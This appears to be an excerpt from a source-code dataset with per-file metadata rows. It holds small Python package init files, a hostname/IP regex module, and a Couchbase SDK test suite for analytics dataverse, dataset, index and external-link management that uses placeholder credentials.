| 0.6
| 0
| 0
| 0.218412
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.266667
| false
| 0
| 0.066667
| 0.266667
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
147297bc665dbd17d35c96ea049f285df2397044
| 43
|
py
|
Python
|
systems/__init__.py
|
Aitocir/UnfoldingWorld
|
70606eec694f006ccd6687912bce7b75d623287e
|
[
"MIT"
] | 2
|
2019-08-30T08:26:44.000Z
|
2021-04-09T14:22:09.000Z
|
systems/__init__.py
|
Aitocir/UnfoldingWorld
|
70606eec694f006ccd6687912bce7b75d623287e
|
[
"MIT"
] | null | null | null |
systems/__init__.py
|
Aitocir/UnfoldingWorld
|
70606eec694f006ccd6687912bce7b75d623287e
|
[
"MIT"
] | null | null | null |
from . import growing
from . import mapping
| 21.5
| 21
| 0.790698
| 6
| 43
| 5.666667
| 0.666667
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162791
| 43
| 2
| 22
| 21.5
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1483f1b63ab4654eb55d746187a8ea9dadf52a0c
| 399
|
py
|
Python
|
django_saltapi/utils.py
|
holmboe/django-saltapi
|
4ca83bd55a1489198583ddd9330355c870d6559a
|
[
"Apache-2.0"
] | 7
|
2015-02-22T07:36:11.000Z
|
2019-02-24T09:02:32.000Z
|
django_saltapi/utils.py
|
holmboe/django-saltapi
|
4ca83bd55a1489198583ddd9330355c870d6559a
|
[
"Apache-2.0"
] | 1
|
2019-01-30T15:20:43.000Z
|
2019-01-30T15:20:43.000Z
|
django_saltapi/utils.py
|
holmboe/django-saltapi
|
4ca83bd55a1489198583ddd9330355c870d6559a
|
[
"Apache-2.0"
] | 9
|
2015-03-24T07:52:21.000Z
|
2019-07-25T08:37:07.000Z
|
# -*- coding: utf-8 -*-
# http://stackoverflow.com/questions/106179/regular-expression-to-match-hostname-or-ip-address
REGEX_IPADDR = "(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])"
REGEX_HOSTNAME = "(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\-]*[A-Za-z0-9])"
REGEX_JID = "([0-9]{20})"
| 57
| 124
| 0.536341
| 94
| 399
| 2.244681
| 0.329787
| 0.085308
| 0.189573
| 0.227488
| 0.407583
| 0.407583
| 0.407583
| 0.407583
| 0.407583
| 0.407583
| 0
| 0.176
| 0.06015
| 399
| 6
| 125
| 66.5
| 0.386667
| 0.285714
| 0
| 0
| 0
| 0.666667
| 0.776596
| 0.737589
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1496186f704fc2be439f7b78c7be77b20dd1f76f
| 292
|
py
|
Python
|
att_classification/tflib/data/__init__.py
|
sageprogrammer/STGAN
|
0afa9bd687cc6b038c831ec8539f3d3dcbccc4b5
|
[
"MIT"
] | 405
|
2019-04-17T03:02:18.000Z
|
2022-03-11T06:36:00.000Z
|
att_classification/tflib/data/__init__.py
|
sageprogrammer/STGAN
|
0afa9bd687cc6b038c831ec8539f3d3dcbccc4b5
|
[
"MIT"
] | 58
|
2019-05-13T09:34:57.000Z
|
2021-12-07T08:40:58.000Z
|
att_classification/tflib/data/__init__.py
|
sageprogrammer/STGAN
|
0afa9bd687cc6b038c831ec8539f3d3dcbccc4b5
|
[
"MIT"
] | 95
|
2019-04-20T02:32:32.000Z
|
2022-03-07T03:58:24.000Z
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tflib.data.dataset import *
from tflib.data.disk_image import *
from tflib.data.memory_data import *
from tflib.data.tfrecord import *
from tflib.data.tfrecord_creator import *
| 29.2
| 41
| 0.835616
| 42
| 292
| 5.404762
| 0.357143
| 0.220264
| 0.286344
| 0.334802
| 0.237885
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113014
| 292
| 9
| 42
| 32.444444
| 0.876448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.125
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2168f96511cd577871ddd4d6fb4cae465a84bab6
| 98
|
py
|
Python
|
tfscripts/compat/v1/__init__.py
|
mhuen/TFScripts
|
4ade57237efcd9ce5332532d8bcc399a06bcddf2
|
[
"MIT"
] | 13
|
2017-06-15T12:36:51.000Z
|
2019-06-27T12:43:06.000Z
|
tfscripts/compat/v1/__init__.py
|
icecube/TFScripts
|
4ade57237efcd9ce5332532d8bcc399a06bcddf2
|
[
"MIT"
] | 6
|
2017-08-10T17:48:37.000Z
|
2020-03-18T19:46:53.000Z
|
tfscripts/compat/v1/__init__.py
|
icecube/TFScripts
|
4ade57237efcd9ce5332532d8bcc399a06bcddf2
|
[
"MIT"
] | 4
|
2017-08-09T20:06:49.000Z
|
2019-06-01T06:38:57.000Z
|
from tfscripts import __version__, __description__, __url__
from tfscripts import FLOAT_PRECISION
| 32.666667
| 59
| 0.877551
| 11
| 98
| 6.636364
| 0.727273
| 0.356164
| 0.520548
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102041
| 98
| 2
| 60
| 49
| 0.829545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dcf5192fe6b96ffe768594b22018f39fe0772f1c
| 39,389
|
py
|
Python
|
couchbase/tests_v3/cases/analyticsmgmt_t.py
|
couchbase/couchbase-python-client
|
99ec055835f5aef0cd07905497b3ab4bb3cbbc32
|
[
"Apache-2.0"
] | 189
|
2015-01-07T18:34:31.000Z
|
2022-03-21T17:41:56.000Z
|
couchbase/tests_v3/cases/analyticsmgmt_t.py
|
couchbase/couchbase-python-client
|
99ec055835f5aef0cd07905497b3ab4bb3cbbc32
|
[
"Apache-2.0"
] | 24
|
2015-05-19T14:00:16.000Z
|
2022-03-16T22:01:30.000Z
|
couchbase/tests_v3/cases/analyticsmgmt_t.py
|
couchbase/couchbase-python-client
|
99ec055835f5aef0cd07905497b3ab4bb3cbbc32
|
[
"Apache-2.0"
] | 60
|
2015-03-10T22:12:50.000Z
|
2022-03-07T21:57:40.000Z
|
# -*- coding:utf-8 -*-
#
# Copyright 2020, Couchbase, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import time
import os
from couchbase_core import ulp
from couchbase_tests.base import CollectionTestCase, SkipTest
from couchbase.management.analytics import (CreateDataverseOptions, DropDataverseOptions, CreateDatasetOptions,
CreateAnalyticsIndexOptions, DropAnalyticsIndexOptions,
DropDatasetOptions, ConnectLinkOptions, DisconnectLinkOptions,
GetLinksAnalyticsOptions)
from couchbase.exceptions import (AnalyticsLinkExistsException, DataverseAlreadyExistsException,
DataverseNotFoundException, DatasetAlreadyExistsException, DatasetNotFoundException,
InvalidArgumentException, NotSupportedException, CompilationFailedException,
ParsingFailedException, AnalyticsLinkNotFoundException)
from couchbase.analytics import (AnalyticsDataType, AnalyticsEncryptionLevel,
AnalyticsLink, AnalyticsLinkType, AzureBlobExternalAnalyticsLink,
CouchbaseAnalyticsEncryptionSettings, CouchbaseRemoteAnalyticsLink, S3ExternalAnalyticsLink)
class AnalyticsIndexManagerTests(CollectionTestCase):
def setUp(self):
super(AnalyticsIndexManagerTests, self).setUp()
self._enable_print_statements = False
if self.is_mock:
raise SkipTest("mock doesn't mock management apis")
if int(self.get_cluster_version().split('.')[0]) < 6:
raise SkipTest("no analytics in {}".format(
self.get_cluster_version()))
self.mgr = self.cluster.analytics_indexes()
self.dataverse_name = "test/dataverse" if int(
self.get_cluster_version().split('.')[0]) == 7 else "test_dataverse"
self.dataset_name = "test_breweries"
# be sure the dataverse exists
self.mgr.create_dataverse(
self.dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
# now ensure our dataset in there
self.mgr.create_dataset(self.dataset_name,
"beer-sample",
CreateDatasetOptions(dataverse_name=self.dataverse_name,
condition='`type` = "brewery"',
ignore_if_exists=True)
)
try:
self.mgr.disconnect_link(DisconnectLinkOptions(
dataverse_name=self.dataverse_name))
except BaseException:
pass
def tearDown(self):
super(AnalyticsIndexManagerTests, self).tearDown()
# be sure the dataverse doesn't exist
try:
dataverse_name = self.mgr._scrub_dataverse_name(
self.dataverse_name)
self.cluster.analytics_query(
"USE {}; DISCONNECT LINK Local;".format(dataverse_name)).metadata()
except DataverseNotFoundException:
pass
try:
self.mgr.disconnect_link(DisconnectLinkOptions(
dataverse_name=self.dataverse_name))
except BaseException:
pass
self.try_n_times(10, 3,
self.mgr.drop_dataverse, self.dataverse_name,
DropDatasetOptions(ignore_if_not_exists=True))
def assertRows(self, query, iterations=10, pause_time=3):
for _ in range(iterations):
resp = self.cluster.analytics_query(query)
for r in resp.rows():
return
time.sleep(pause_time)
self.fail("query '{}' yielded no rows after {} attempts pausing {} sec between attempts"
.format(query, iterations, pause_time))
def test_create_dataverse(self):
# lets query for the existence of test-dataverse
statement = 'SELECT * FROM Metadata.`Dataverse` WHERE DataverseName="{}";'.format(
self.dataverse_name)
result = self.cluster.analytics_query(statement)
self.assertEqual(1, len(result.rows()))
def test_create_dataverse_ignore_exists(self):
self.assertRaises(DataverseAlreadyExistsException,
self.mgr.create_dataverse, self.dataverse_name)
self.mgr.create_dataverse(
self.dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
def test_drop_dataverse(self):
self.mgr.drop_dataverse(self.dataverse_name)
self.mgr.connect_link()
statement = 'SELECT * FROM Metadata.`Dataverse` WHERE DataverseName="{}";'.format(
self.dataverse_name)
result = self.cluster.analytics_query(statement)
self.assertEqual(0, len(result.rows()))
def test_drop_dataverse_ignore_not_exists(self):
self.mgr.drop_dataverse(self.dataverse_name)
self.assertRaises(DataverseNotFoundException,
self.mgr.drop_dataverse, self.dataverse_name)
self.mgr.drop_dataverse(
self.dataverse_name, DropDataverseOptions(ignore_if_not_exists=True))
def test_create_dataset(self):
# we put a dataset in during the setUp, so...
datasets = self.mgr.get_all_datasets()
for dataset in datasets:
if self._enable_print_statements:
print(dataset)
if dataset.dataset_name == self.dataset_name:
return
self.fail("didn't find {} in listing of all datasets".format(
self.dataset_name))
def test_create_dataset_ignore_exists(self):
self.assertRaises(DatasetAlreadyExistsException, self.mgr.create_dataset, self.dataset_name, 'beer-sample',
CreateDatasetOptions(dataverse_name=self.dataverse_name))
self.mgr.create_dataset(self.dataset_name, 'beer-sample',
CreateDatasetOptions(dataverse_name=self.dataverse_name), ignore_if_exists=True)
def test_drop_dataset(self):
self.mgr.drop_dataset(self.dataset_name, DropDatasetOptions(
dataverse_name=self.dataverse_name))
self.assertRaises(DatasetNotFoundException, self.mgr.drop_dataset, self.dataset_name,
DropDatasetOptions(dataverse_name=self.dataverse_name))
self.mgr.drop_dataset(self.dataset_name, DropDatasetOptions(dataverse_name=self.dataverse_name,
ignore_if_not_exists=True))
def test_create_index(self):
self.mgr.create_index("test_brewery_idx", self.dataset_name,
{'name': AnalyticsDataType.STRING,
'description': AnalyticsDataType.STRING},
CreateAnalyticsIndexOptions(dataverse_name=self.dataverse_name))
def check_for_idx(idx):
indexes = self.mgr.get_all_indexes()
for index in indexes:
if self._enable_print_statements:
print(index)
if index.name == idx:
return
raise Exception(
"unable to find 'test_brewery_idx' in list of all indexes")
self.try_n_times(10, 3, check_for_idx, 'test_brewery_idx')
def test_drop_index(self):
# create one first, if not already there
self.mgr.create_index("test_brewery_idx", self.dataset_name,
{'name': AnalyticsDataType.STRING,
'description': AnalyticsDataType.STRING},
CreateAnalyticsIndexOptions(dataverse_name=self.dataverse_name))
def check_for_idx(idx):
indexes = self.mgr.get_all_indexes()
for index in indexes:
if self._enable_print_statements:
print(index)
if index.name == idx:
return
raise Exception(
"unable to find 'test_brewery_idx' in list of all indexes")
self.try_n_times(10, 3, check_for_idx, 'test_brewery_idx')
self.mgr.drop_index("test_brewery_idx", self.dataset_name,
DropAnalyticsIndexOptions(dataverse_name=self.dataverse_name))
self.try_n_times_till_exception(
10, 3, check_for_idx, 'test_brewery_idx')
def test_connect_link(self):
self.mgr.connect_link(ConnectLinkOptions(
dataverse_name=self.dataverse_name))
# connect link should result in documents in the dataset, so...
dataverse_name = self.mgr._scrub_dataverse_name(self.dataverse_name)
self.assertRows(
'USE {}; SELECT * FROM `{}` LIMIT 1'.format(dataverse_name, self.dataset_name))
# manually stop it for now
self.cluster.analytics_query(
'USE {}; DISCONNECT LINK Local'.format(dataverse_name, self.dataset_name)).metadata()
def test_get_pending_mutations(self):
try:
result = self.mgr.get_pending_mutations()
if self._enable_print_statements:
# we expect no test_dataverse key yet
print(result)
self.assertFalse("test_dataverse" in result.keys())
self.mgr.connect_link(ConnectLinkOptions(
dataverse_name=self.dataverse_name))
time.sleep(5)
result = self.mgr.get_pending_mutations()
if self._enable_print_statements:
print(result)
dataverse_name = self.mgr._scrub_dataverse_name(
self.dataverse_name).replace("`", "")
self.assertTrue(dataverse_name in result.keys())
except NotSupportedException:
raise SkipTest(
"get pending mutations not supported on this cluster")
def test_v6_dataverse_name_parsing(self):
if int(self.cluster_version.split('.')[0]) != 6:
raise SkipTest("Test only for 6.x versions")
# wish the analytics service was consistent here :/
if float(self.cluster_version[:3]) >= 6.6:
with self.assertRaises(CompilationFailedException):
self.mgr.create_dataverse(
"test.beer_sample", CreateDataverseOptions(ignore_if_exists=True))
else:
self.mgr.create_dataverse(
"test.beer_sample", CreateDataverseOptions(ignore_if_exists=True))
# wish the analytics service was consistent here also :/
with self.assertRaises(ParsingFailedException):
# test/beer_sample => `test`.`beer_sample` which is not valid prior
# to 7.0
self.mgr.create_dataverse(
"test/beer_sample", CreateDataverseOptions(ignore_if_exists=True))
def test_v7_dataverse_name_parsing(self):
if int(self.cluster_version.split('.')[0]) != 7:
raise SkipTest("Test only for 7.x versions")
# test.beer_sample => `test.beer_sample` which is valid >= 7.0
self.mgr.create_dataverse(
"test.beer_sample", CreateDataverseOptions(ignore_if_exists=True))
statement = 'SELECT * FROM Metadata.`Dataverse` WHERE DataverseName="test.beer_sample";'.format(
self.dataverse_name)
result = self.cluster.analytics_query(statement)
self.assertEqual(1, len(result.rows()))
self.mgr.drop_dataverse("test.beer_sample")
# test/beer_sample => `test`.`beer_sample` which is valid >= 7.0
self.mgr.create_dataverse(
"test/beer_sample", CreateDataverseOptions(ignore_if_exists=True))
statement = 'SELECT * FROM Metadata.`Dataverse` WHERE DataverseName="test/beer_sample";'.format(
self.dataverse_name)
result = self.cluster.analytics_query(statement)
self.assertEqual(1, len(result.rows()))
self.mgr.drop_dataverse("test/beer_sample")
class AnalyticsIndexManagerLinkTests(CollectionTestCase):
def setUp(self):
super(AnalyticsIndexManagerLinkTests, self).setUp()
if self.is_mock:
raise SkipTest("mock doesn't mock management apis")
if int(self.cluster_version.split('.')[0]) < 6:
raise SkipTest("no analytics in {}".format(
self.cluster_version))
if int(self.cluster_version.split('.')[0]) < 7:
raise SkipTest("No analytics link management API in {}".format(
self.cluster_version))
self.mgr = self.cluster.analytics_indexes()
def test_couchbase_remote_link_encode(self):
link = CouchbaseRemoteAnalyticsLink("test_dataverse",
"cbremote",
"localhost",
CouchbaseAnalyticsEncryptionSettings(
AnalyticsEncryptionLevel.NONE),
username="Administrator",
password="password")
encoded = link.form_encode().decode()
query_str = ulp.parse_qs(encoded)
self.assertEqual("localhost", query_str.get("hostname")[0])
self.assertEqual(AnalyticsLinkType.CouchbaseRemote.value,
query_str.get("type")[0])
self.assertEqual(AnalyticsEncryptionLevel.NONE.value,
query_str.get("encryption")[0])
self.assertEqual("Administrator", query_str.get("username")[0])
self.assertEqual("password", query_str.get("password")[0])
link = CouchbaseRemoteAnalyticsLink("test_dataverse",
"cbremote",
"localhost",
CouchbaseAnalyticsEncryptionSettings(
AnalyticsEncryptionLevel.FULL,
certificate=bytes(
'certificate', 'utf-8'),
client_certificate=bytes(
'clientcertificate', 'utf-8'),
client_key=bytes('clientkey', 'utf-8')),
)
encoded = link.form_encode().decode()
query_str = ulp.parse_qs(encoded)
self.assertEqual("localhost", query_str.get("hostname")[0])
self.assertEqual(AnalyticsLinkType.CouchbaseRemote.value,
query_str.get("type")[0])
self.assertEqual(AnalyticsEncryptionLevel.FULL.value,
query_str.get("encryption")[0])
self.assertEqual("certificate", query_str.get("certificate")[0])
self.assertEqual("clientcertificate",
query_str.get("clientCertificate")[0])
self.assertEqual("clientkey", query_str.get("clientKey")[0])
def test_s3_external_link(self):
dataverse_name = "test_dataverse"
self.mgr.create_dataverse(
dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
link = S3ExternalAnalyticsLink(dataverse_name,
"s3link",
"accesskey",
"us-west-2",
secret_access_key="mysupersecretkey",
)
link1 = S3ExternalAnalyticsLink(dataverse_name,
"s3link1",
"accesskey1",
"us-east-2",
secret_access_key="mysupersecretkey1",
)
self.mgr.create_link(link)
self.mgr.create_link(link1)
links = self.mgr.get_links()
self.assertEqual(2, len(links))
for l in links:
link_match = (l.dataverse_name() == link.dataverse_name()
and l.name() == link.name()
and l.link_type() == AnalyticsLinkType.S3External
and l._region == link._region
and l._access_key_id == link._access_key_id)
link1_match = (l.dataverse_name() == link1.dataverse_name()
and l.name() == link1.name()
and l.link_type() == AnalyticsLinkType.S3External
and l._region == link1._region
and l._access_key_id == link1._access_key_id)
self.assertTrue(link_match or link1_match)
links = self.mgr.get_links(GetLinksAnalyticsOptions(
dataverse_name=dataverse_name, name=link.name()))
self.assertEqual(1, len(links))
self.assertTrue(links[0].dataverse_name() == link.dataverse_name()
and links[0].name() == link.name()
and links[0].link_type() == AnalyticsLinkType.S3External
and links[0]._region == link._region
and links[0]._access_key_id == link._access_key_id)
new_link = S3ExternalAnalyticsLink(dataverse_name,
"s3link",
"accesskey",
"eu-west-2",
secret_access_key="mysupersecretkey1",
)
self.mgr.replace_link(new_link)
links = self.mgr.get_links()
self.assertEqual(2, len(links))
links = self.mgr.get_links(GetLinksAnalyticsOptions(
dataverse_name=dataverse_name, name=new_link.name()))
self.assertEqual(1, len(links))
self.assertTrue(links[0].dataverse_name() == new_link.dataverse_name()
and links[0].name() == new_link.name()
and links[0].link_type() == AnalyticsLinkType.S3External
and links[0]._region == new_link._region
and links[0]._access_key_id == new_link._access_key_id)
self.mgr.drop_link("s3link", dataverse_name)
self.mgr.drop_link("s3link1", dataverse_name)
links = self.mgr.get_links()
self.assertEqual(0, len(links))
self.mgr.drop_dataverse(
dataverse_name, DropDataverseOptions(ignore_if_not_exists=True))
def test_s3_external_link_compound_dataverse(self):
dataverse_name = "test/dataverse"
self.mgr.create_dataverse(
dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
link = S3ExternalAnalyticsLink(dataverse_name,
"s3link",
"accesskey",
"us-west-2",
secret_access_key="mysupersecretkey",
)
link1 = S3ExternalAnalyticsLink(dataverse_name,
"s3link1",
"accesskey1",
"us-east-2",
secret_access_key="mysupersecretkey1",
)
self.mgr.create_link(link)
self.mgr.create_link(link1)
links = self.mgr.get_links()
self.assertEqual(2, len(links))
for l in links:
link_match = (l.dataverse_name() == link.dataverse_name()
and l.name() == link.name()
and l.link_type() == AnalyticsLinkType.S3External
and l._region == link._region
and l._access_key_id == link._access_key_id)
link1_match = (l.dataverse_name() == link1.dataverse_name()
and l.name() == link1.name()
and l.link_type() == AnalyticsLinkType.S3External
and l._region == link1._region
and l._access_key_id == link1._access_key_id)
self.assertTrue(link_match or link1_match)
links = self.mgr.get_links(GetLinksAnalyticsOptions(
dataverse_name=dataverse_name, name=link.name()))
self.assertEqual(1, len(links))
self.assertTrue(links[0].dataverse_name() == link.dataverse_name()
and links[0].name() == link.name()
and links[0].link_type() == AnalyticsLinkType.S3External
and links[0]._region == link._region
and links[0]._access_key_id == link._access_key_id)
new_link = S3ExternalAnalyticsLink(dataverse_name,
"s3link",
"accesskey",
"eu-west-2",
secret_access_key="mysupersecretkey1",
)
self.mgr.replace_link(new_link)
links = self.mgr.get_links()
self.assertEqual(2, len(links))
links = self.mgr.get_links(GetLinksAnalyticsOptions(
dataverse_name=dataverse_name, name=new_link.name()))
self.assertEqual(1, len(links))
self.assertTrue(links[0].dataverse_name() == new_link.dataverse_name()
and links[0].name() == new_link.name()
and links[0].link_type() == AnalyticsLinkType.S3External
and links[0]._region == new_link._region
and links[0]._access_key_id == new_link._access_key_id)
self.mgr.drop_link("s3link", dataverse_name)
self.mgr.drop_link("s3link1", dataverse_name)
links = self.mgr.get_links()
self.assertEqual(0, len(links))
self.mgr.drop_dataverse(
dataverse_name, DropDataverseOptions(ignore_if_not_exists=True))
def test_create_link_fail_link_exists(self):
dataverse_name = "test_dataverse"
self.mgr.create_dataverse(
dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
link = S3ExternalAnalyticsLink(dataverse_name,
"s3link",
"accesskey",
"us-west-2",
secret_access_key="mysupersecretkey",
)
self.mgr.create_link(link)
with self.assertRaises(AnalyticsLinkExistsException):
self.mgr.create_link(link)
self.mgr.drop_link("s3link", dataverse_name)
self.mgr.drop_dataverse(
dataverse_name, DropDataverseOptions(ignore_if_not_exists=True))
def test_link_fail_dataverse_not_found(self):
dataverse_name = "test_dataverse"
self.mgr.create_dataverse(
dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
link = S3ExternalAnalyticsLink("notadataverse",
"s3link",
"accesskey",
"us-west-2",
secret_access_key="mysupersecretkey",
)
with self.assertRaises(DataverseNotFoundException):
self.mgr.create_link(link)
with self.assertRaises(DataverseNotFoundException):
self.mgr.replace_link(link)
with self.assertRaises(DataverseNotFoundException):
self.mgr.drop_link(link.name(), link.dataverse_name())
link = CouchbaseRemoteAnalyticsLink("notadataverse",
"cbremote",
"localhost",
CouchbaseAnalyticsEncryptionSettings(
AnalyticsEncryptionLevel.NONE),
username="Administrator",
password="password")
with self.assertRaises(DataverseNotFoundException):
self.mgr.create_link(link)
with self.assertRaises(DataverseNotFoundException):
self.mgr.replace_link(link)
with self.assertRaises(DataverseNotFoundException):
self.mgr.drop_link(link.name(), link.dataverse_name())
link = AzureBlobExternalAnalyticsLink("notadataverse",
"azurebloblink",
account_name="myaccount",
account_key="myaccountkey")
with self.assertRaises(DataverseNotFoundException):
self.mgr.create_link(link)
with self.assertRaises(DataverseNotFoundException):
self.mgr.replace_link(link)
with self.assertRaises(DataverseNotFoundException):
self.mgr.drop_link(link.name(), link.dataverse_name())
self.mgr.drop_dataverse(
dataverse_name, DropDataverseOptions(ignore_if_not_exists=True))
def test_create_couchbase_link_fail_invalid_argument(self):
dataverse_name = "test_dataverse"
self.mgr.create_dataverse(
dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
link = CouchbaseRemoteAnalyticsLink("",
"cbremote",
"localhost",
CouchbaseAnalyticsEncryptionSettings(
AnalyticsEncryptionLevel.NONE),
username="Administrator",
password="password")
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
link = CouchbaseRemoteAnalyticsLink(dataverse_name,
"",
"localhost",
CouchbaseAnalyticsEncryptionSettings(
AnalyticsEncryptionLevel.NONE),
username="Administrator",
password="password")
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
link = CouchbaseRemoteAnalyticsLink(dataverse_name,
"cbremote",
"",
CouchbaseAnalyticsEncryptionSettings(
AnalyticsEncryptionLevel.NONE),
username="Administrator",
password="password")
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
link = CouchbaseRemoteAnalyticsLink(dataverse_name,
"cbremote",
"localhost",
CouchbaseAnalyticsEncryptionSettings(
AnalyticsEncryptionLevel.NONE),
password="password")
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
link = CouchbaseRemoteAnalyticsLink(dataverse_name,
"cbremote",
"localhost",
CouchbaseAnalyticsEncryptionSettings(
AnalyticsEncryptionLevel.NONE),
username="Administrator")
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
link = CouchbaseRemoteAnalyticsLink(dataverse_name,
"cbremote",
"localhost",
CouchbaseAnalyticsEncryptionSettings(
AnalyticsEncryptionLevel.HALF),
password="password")
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
link = CouchbaseRemoteAnalyticsLink(dataverse_name,
"cbremote",
"localhost",
CouchbaseAnalyticsEncryptionSettings(
AnalyticsEncryptionLevel.HALF),
username="Administrator")
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
link = CouchbaseRemoteAnalyticsLink(dataverse_name,
"cbremote",
"localhost",
CouchbaseAnalyticsEncryptionSettings(
AnalyticsEncryptionLevel.FULL)
)
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
link = CouchbaseRemoteAnalyticsLink(dataverse_name,
"cbremote",
"localhost",
CouchbaseAnalyticsEncryptionSettings(
AnalyticsEncryptionLevel.FULL,
certificate=bytes('certificate', 'utf-8'))
)
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
link = CouchbaseRemoteAnalyticsLink(dataverse_name,
"cbremote",
"localhost",
CouchbaseAnalyticsEncryptionSettings(
AnalyticsEncryptionLevel.FULL,
certificate=bytes(
'certificate', 'utf-8'),
client_certificate=bytes('clientcert', 'utf-8'))
)
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
link = CouchbaseRemoteAnalyticsLink(dataverse_name,
"cbremote",
"localhost",
CouchbaseAnalyticsEncryptionSettings(
AnalyticsEncryptionLevel.FULL,
certificate=bytes(
'certificate', 'utf-8'),
client_key=bytes('clientkey', 'utf-8'))
)
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
self.mgr.drop_dataverse(
dataverse_name, DropDataverseOptions(ignore_if_not_exists=True))
def test_create_s3_link_fail_invalid_argument(self):
dataverse_name = "test_dataverse"
self.mgr.create_dataverse(
dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
link = S3ExternalAnalyticsLink("",
"s3link",
"accesskey",
"us-west-2",
secret_access_key="mysupersecretkey",
)
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
link = S3ExternalAnalyticsLink(dataverse_name,
"",
"accesskey",
"us-west-2",
secret_access_key="mysupersecretkey",
)
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
link = S3ExternalAnalyticsLink(dataverse_name,
"s3link",
"",
"us-west-2",
secret_access_key="mysupersecretkey",
)
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
link = S3ExternalAnalyticsLink(dataverse_name,
"s3link",
"accesskey",
"",
secret_access_key="mysupersecretkey",
)
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
link = S3ExternalAnalyticsLink("",
"s3link",
"accesskey",
"us-west-2",
)
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
self.mgr.drop_dataverse(
dataverse_name, DropDataverseOptions(ignore_if_not_exists=True))
def test_create_azureblob_link_fail_invalid_argument(self):
dataverse_name = "test_dataverse"
self.mgr.create_dataverse(
dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
link = AzureBlobExternalAnalyticsLink("",
"azurebloblink",
account_name="myaccount",
account_key="myaccountkey")
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
link = AzureBlobExternalAnalyticsLink(dataverse_name,
"",
account_name="myaccount",
account_key="myaccountkey")
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
link = AzureBlobExternalAnalyticsLink(dataverse_name,
"azurebloblink")
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
